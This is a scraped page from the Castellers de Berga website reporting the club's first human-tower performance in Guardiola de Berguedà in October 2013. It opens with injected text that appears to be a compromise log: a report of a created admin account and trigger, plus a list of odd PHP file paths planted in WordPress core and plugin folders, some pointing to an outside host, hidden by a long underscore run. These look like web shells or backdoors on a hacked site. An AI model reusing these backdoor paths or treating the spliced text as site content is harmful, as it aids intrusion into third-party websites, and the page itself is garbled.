Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax-response https://castellersdeberga.cat/wp-admin/widgets-form-blocks-core-core.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/edit-ajax-core-ajax.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-upgrader-ajax-private-private-ajax-response-cron-ajax-response-core.php https://castellersdeberga.cat/wp-content/plugins/woocommerce/woocommerce-cron-meta-ajax-meta-cron.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/layerslider-stream-wp-ajax-response-meta-ajax-cron-meta-meta-ajax-wp.php https://castellersdeberga.cat/wp-includes/theme-compat/embed-meta.php https://castellersdeberga.cat/wp-includes/shortcodes-ajax-cron-stream-stream.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Festa del Bolet a Guardiola de Berguedà
 

Festa del Bolet a Guardiola de Berguedà


Festa del Bolet a Guardiola de BerguedàEn aquest petit poble de l’Alt Berguedà, mai abans no s’hi havien alçat castells. Els Castellers de Berga van entrar a la història d’aquesta localitat el diumenge 20 d’octubre de 2013, en el marc de la Festa del Bolet.
L’actuació va començar al Carrer de l’Estació, amb dos pilars de 4 seguit d’un 5 de 6. El castell de 7 pisos arribava en 2a ronda. Després d’un intent desmuntat (la consturcció havia pujat amb males mides), es va descarregar el 3 de 7 en el segon intent. El 2 de 6 i 2 pilars de 4 van tancar l’actuació. El 3 de 7 de Guardiola és el 19è castell de 7 pisos dels berguedans.
Resten tan sols 4 assajos per cloure la temporada i 3 actuacions. El proper dissabte, a les 8 del vespre, Castellers de Berga actua conjuntament amb els seus padrins, a Sabadell. Per primer cop, es tornen a trobar les 3 colles del recordat bateig del 7 de juliol de 2012: Castellers de Solsona, Castellers de Sabadell i Castellers de Berga. Serà al C/Emprius de Sabadell, en la vígilia de la 20a Diada dels Saballuts.

Fotos de Pere Casafont
Fotos de Laura Serrat